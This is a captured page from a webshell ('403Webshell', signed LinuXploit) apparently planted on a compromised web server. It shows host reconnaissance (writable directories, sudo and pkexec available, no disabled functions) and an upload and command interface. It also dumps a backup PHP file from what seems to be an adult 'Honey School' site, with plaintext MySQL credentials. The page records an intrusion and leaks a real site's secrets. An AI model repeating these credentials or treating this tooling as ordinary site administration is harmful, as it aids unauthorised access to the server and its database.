403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.185
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/honeyschool.com/public_html/t1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/honeyschool.com/public_html/t1/updates.php-bak
<? include "header-2.php"; ?>

<div class="buttons">
	<img src="images/photos1.gif" width="836" height="33" alt="Recent Photo Home Work From Honey School" />
</div>

<table class='updates' align='center' cellspacing='0' cellpadding='0' border='0'>
<?
$mysqlhost = "localhost";
$mysqldb = "honeys";
$mysqluser = "honeyadmin";
$mysqlpass = "honeys2002";
$UPD = 6;
$z = "HoneySchool";
$time = mktime("12", "00", "00", date("m", time()), date("d", time()),  date("Y", time()), 1);

$vruzka=@mysql_connect($mysqlhost,$mysqluser,$mysqlpass,MYSQL_CLIENT_COMPRESS) or die("Could not connect to MySQL Server: " . mysql_error());
@mysql_select_db($mysqldb) or die("Could not select database");

$select = "select * from sets where dates<=$time and compliant='yes' and pics>0 order by dates DESC LIMIT 7";

$limit=10;
$num=0;
	$zaiavka=@mysql_unbuffered_query("SELECT icon,day,name,girlname from sets where dates<=$time and compliant='yes' and word like '%HoneySchool%' and pics > 0 order by dates DESC limit $limit") or die("Query to MySQL Failed: " . mysql_error());
	while($otgovor=mysql_fetch_row($zaiavka))
	{
		if($num%5==0) echo "<tr>\r\n";
		echo "<td valign='top'><a href='join.php'><img src='$otgovor[0]' class='thumb-updates' alt='$otgovor[2]'></a><br />\r\n<p class='date'>$otgovor[1]</p>\r\n<p class='girl'>" . str_replace(';','<br />',$otgovor[3]) . "</p>\r\n<p class='desc'>$otgovor[2]</p>\r\n</td>\r\n";
		$num++;
		if($num%5==0) echo "</tr>\r\n";
	}
?>
</table>

<div class="join">
	<a href="join.php" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Updates1','','images/index-o_28.gif',1)"><img src="images/index_28.gif" name="Updates1" width="874" height="44" border="0" id="Updates1" alt="Click Here To Join Honey School Now!" /></a>
</div>
<div class="buttons">
	<img src="images/videos1.gif" width="883" height="33" alt="Recent Videos from Honey School" />
</div>

<table class='updates' align='center' cellspacing='0' cellpadding='0' border='0'>
<?
$limit=10;
$num=0;

	$zaiavka=@mysql_unbuffered_query("SELECT icon,day,name,girlname from sets where dates<=$time and compliant='yes' and word like '%Videos%' and pics > 0 order by dates DESC limit $limit") or die("Query to MySQL Failed: " . mysql_error());
	while($otgovor=mysql_fetch_row($zaiavka))
	{
		if($num%5==0) echo "<tr>\r\n";
				echo "<td valign='top'>\r\n	<a href='join.php'><img src='$otgovor[0]' alt='$otgovor[2]' width='150' height='120' border=1></a><br />\r\n";
				echo "<p class='date'>$otgovor[1]</p>\r\n<p class='girl'>" . str_replace(';','<br />',$otgovor[3]) . "</p>\r\n<p class='desc'>$otgovor[2]</p>\r\n</td>\r\n";
		$num++;
		if($num%5==0) echo "</tr>\r\n";
	}
?>
</table>

<div class="join">
	<a href="join.php" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Updates2','','images/index-o_28.gif',1)"><img src="images/index_28.gif" name="Updates2" width="874" height="44" border="0" id="Updates2" alt="Click Here To Join Honey School Now!" /></a>
</div>
<div class="buttons">
	<img src="images/photos2.gif" width="772" height="33" alt="Upcoming Photo Home Work from Honey School" />
</div>

<table class='updates' align='center' cellspacing='0' cellpadding='0' border='0'>
<?
$limit=10;
$num=0;
	$zaiavka=@mysql_unbuffered_query("SELECT icon,day,name,girlname from sets where dates>$time and compliant='yes' and word like '%HoneySchool%' and pics > 0 order by dates ASC limit $limit") or die("Query to MySQL Failed: " . mysql_error());
	while($otgovor=mysql_fetch_row($zaiavka))
	{

		if($num%5==0) echo "<tr>\r\n";
		echo "<td valign='top'><a href='join.php'><img src='$otgovor[0]' class='thumb-updates' alt='$otgovor[2]'></a><br />\r\n<p class='date'>$otgovor[1]</p>\r\n<p class='girl'>" . str_replace(';','<br />',$otgovor[3]) . "</p>\r\n<p class='desc'>$otgovor[2]</p>\r\n</td>\r\n";
		$num++;
		if($num%5==0) echo "</tr>\r\n";
	}
?>
</table>

<div class="join">
	<a href="join.php" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Updates3','','images/index-o_28.gif',1)"><img src="images/index_28.gif" name="Updates3" width="874" height="44" border="0" id="Updates3" alt="Click Here To Join Honey School Now!" /></a>
</div>
<div class="buttons">
	<img src="images/videos2.gif" width="761" height="33" alt="Upcoming Video Home Work from Honey School" />
</div>

<table class='updates' align='center' cellspacing='0' cellpadding='0' border='0'>
<?
$limit=10;
$num=0;

	$zaiavka=@mysql_unbuffered_query("SELECT icon,day,name,girlname from sets where dates>$time and compliant='yes' and word like '%Videos%' and pics > 0 order by dates ASC limit $limit") or die("Query to MySQL Failed: " . mysql_error());
	while($otgovor=mysql_fetch_row($zaiavka))
	{
		if($num%5==0) echo "<tr>\r\n";
				echo "<td valign='top'>\r\n<a href='join.php'><img src='$otgovor[0]' alt='$otgovor[2]' width='150' height='120' border=0><br /></a>\r\n";
				echo "<p class='date'>$otgovor[1]</p>\r\n<p class='girl'>" . str_replace(';','<br />',$otgovor[3]) . "</p>\r\n<p class='desc'>$otgovor[2]</p>\r\n</td>\r\n";
		$num++;
		if($num%5==0) echo "</tr>\r\n";
	}
echo "</table>";
include "footer.php";
?>

Youez - 2016 - github.com/yon3zu
LinuXploit